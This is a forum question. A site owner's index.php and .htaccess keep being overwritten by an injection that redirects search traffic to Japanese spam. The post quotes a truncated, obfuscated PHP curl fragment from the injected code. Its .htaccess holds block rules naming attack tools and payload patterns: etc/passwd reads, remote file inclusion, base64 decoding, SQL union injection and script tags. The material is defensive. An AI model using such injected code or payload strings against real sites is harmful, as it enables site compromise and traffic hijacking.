# .htaccess file is always hacked without a reason

Tags: .htaccess

A website is always hacked by adding a line in 2nd line of index.php page starts with:

> error_reporting(0);header('Content-Type: text/html; charset=utf-8');$.................... curl_setopt($OooOOOO,CURLOPT_URL,$OooO);curl_setopt($OooOOOO,CURLOPT_SSL_VERIFYHOST, 0);curl_setopt($OooOOOO,CURLOPT_SSL_VERIFYPEER, 0);curl_setopt($OooOOOO,CURLO .....................

same time the .htaccess is emptied, and replaced by the below code

```
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
```

i can't know how to track this hacking, and what to put else in .htaccess, i'm already putting the below in .htaccess:

```
Options All -Indexes
.....
.....
<IfModule mod_expires.c>
ExpiresActive On

ExpiresByType text/html "access 1 month"
ExpiresByType application/pdf "access 1 month"
ExpiresByType text/x-javascript "access 1 month"
ExpiresByType application/x-shockwave-flash "access 1 month"
ExpiresByType image/x-icon "access 1 year"
ExpiresDefault "access 1 month"
</IfModule>
# Prevent viewing of htaccess file
<Files ~ "^\.ht">
order allow,deny
deny from all
satisfy all
</Files>
.....

<IfModule mod_rewrite.c>
    RewriteEngine On
....
....
</IfModule>

....
....

################################## don't edit below ####################

<FilesMatch "\.(ttf|otf|eot|woff|woff2)$">
  <IfModule mod_headers.c>
    Header set Access-Control-Allow-Origin "*"
  </IfModule>
</FilesMatch>


#disble viewing htaccess
<files ~ "^.*\.([Hh][Tt][Aa])">

    order allow,deny
    deny from all
    satisfy all
</files>

# Block suspicious request methods

RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK|DEBUG) [NC]

RewriteRule ^(.*)$ - [F,L]


# Block WP timthumb hack

RewriteCond %{REQUEST_URI} (timthumb\.php|phpthumb\.php|thumb\.php|thumbs\.php) [NC]

RewriteRule . - [S=1]


# Block suspicious user agents and requests

RewriteCond %{HTTP_USER_AGENT} (libwww-perl|wget|python|nikto|curl|scan|java|winhttp|clshttp|loader) [NC,OR]

RewriteCond %{HTTP_USER_AGENT} (<|>|'|%0A|%0D|%27|%3C|%3E|%00) [NC,OR]

RewriteCond %{THE_REQUEST} \?\ HTTP/ [NC,OR]

RewriteCond %{THE_REQUEST} \/\*\ HTTP/ [NC,OR]

RewriteCond %{THE_REQUEST} etc/passwd [NC,OR]

RewriteCond %{THE_REQUEST} cgi-bin [NC,OR]

RewriteCond %{THE_REQUEST} (%0A|%0D) [NC,OR]


# Block MySQL injections, RFI, base64, etc.

RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR]

RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(\.\.//?)+ [OR]

RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC,OR]

RewriteCond %{QUERY_STRING} \=PHP[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12} [NC,OR]

RewriteCond %{QUERY_STRING} (\.\./|\.\.) [OR]

RewriteCond %{QUERY_STRING} ftp\: [NC,OR]

RewriteCond %{QUERY_STRING} http\: [NC,OR]

RewriteCond %{QUERY_STRING} https\: [NC,OR]

RewriteCond %{QUERY_STRING} \=\|w\| [NC,OR]

RewriteCond %{QUERY_STRING} ^(.*)/self/(.*)$ [NC,OR]

RewriteCond %{QUERY_STRING} ^(.*)cPath=http://(.*)$ [NC,OR]

RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]

RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]

RewriteCond %{QUERY_STRING} (\<|%3C).*iframe.*(\>|%3E) [NC,OR]

RewriteCond %{QUERY_STRING} (<|%3C)([^i]*i)+frame.*(>|%3E) [NC,OR]

RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [NC,OR]

RewriteCond %{QUERY_STRING} base64_(en|de)code[^(]*\([^)]*\) [NC,OR]

RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR]

RewriteCond %{QUERY_STRING} ^.*(\[|\]|\(|\)|<|>).* [NC,OR]

RewriteCond %{QUERY_STRING} (NULL|OUTFILE|LOAD_FILE) [OR]

RewriteCond %{QUERY_STRING} (\./|\../|\.../)+(motd|etc|bin) [NC,OR]

RewriteCond %{QUERY_STRING} (localhost|loopback|127\.0\.0\.1) [NC,OR]

RewriteCond %{QUERY_STRING} (<|>|'|%0A|%0D|%27|%3C|%3E|%00) [NC,OR]

RewriteCond %{QUERY_STRING} concat[^\(]*\( [NC,OR]

RewriteCond %{QUERY_STRING} union([^s]*s)+elect [NC,OR]

RewriteCond %{QUERY_STRING} union([^a]*a)+ll([^s]*s)+elect [NC,OR]

RewriteCond %{QUERY_STRING} (sp_executesql) [NC]

RewriteRule ^(.*)$ - [F,L]

# Deny browser access to config files

<FilesMatch ".(txt)$">
order allow,deny
deny from all
</FilesMatch>
<FilesMatch "^(install\.php|setup\.php|wp-config\.php|config\.php|configuration\.php|php\.ini|php5\.ini|bb-config\.php|db.php)">
Order allow,deny
Deny from all
#Allow from 1.2.3.4
</FilesMatch>
<IfModule mod_headers.c>
    # WEEK
    <FilesMatch "\.(jpg|jpeg|png|gif|swf)$">
        Header set Cache-Control "max-age=604800, public"
    </FilesMatch>

    # WEEK
    <FilesMatch "\.(js|css|swf)$">
        Header set Cache-Control "max-age=604800"
    </FilesMatch>
</IfModule>

# php -- BEGIN cPanel-generated handler, do not edit
# Set the “alt-php56” package as the default “PHP” programming language.
<IfModule mime_module>
  AddHandler application/x-httpd-alt-php56 .php .php5 .phtml
</IfModule>
# php -- END cPanel-generated handler, do not edit
```

Comment: Thanks for sharing your htaccess rules file in your question. Could you please do let us know 2 points here. 1st- What is the exact problem you are facing(any errors you are seeing? OR any url which is accessible which you don't want to be accessed?)? 2nd- How do you think its hacked? Kindly elaborate more on these points, thank you.

Comment: the website gives black page, i find added code in 2nd line in index.php and .htaccess is changed ... also when googling the website, i find the URL, and below it a japanese letters ... when i upload my .htaccess and index.php, things comes back, and google crawlers start displaying the normal website text in search results.

Comment: When you claim that some process unknown to you overwrites your files, then what points is there in asking what you should out into thise files? You need to fix the cause instead of curing the symptom. You need to take that site offline NOW!

Comment: i want to know what may cause this according to your experience ... how to monitor and catch what happens ... what to add more into .htaccess in order to make more protection.

Comment: this happened again, 3 days ago ... adding code to .htaccess, and adding code in index.php to redirect traffic to a chinese or japanese website that appeared in google when typing the website name
即納最大半額 Vintage 50年代 Lee 91-B アメリカ直輸入 -www ...www.myoriginalwebste.com
Translate this page
Vintage 50年代 Lee 91-B アメリカ直輸入.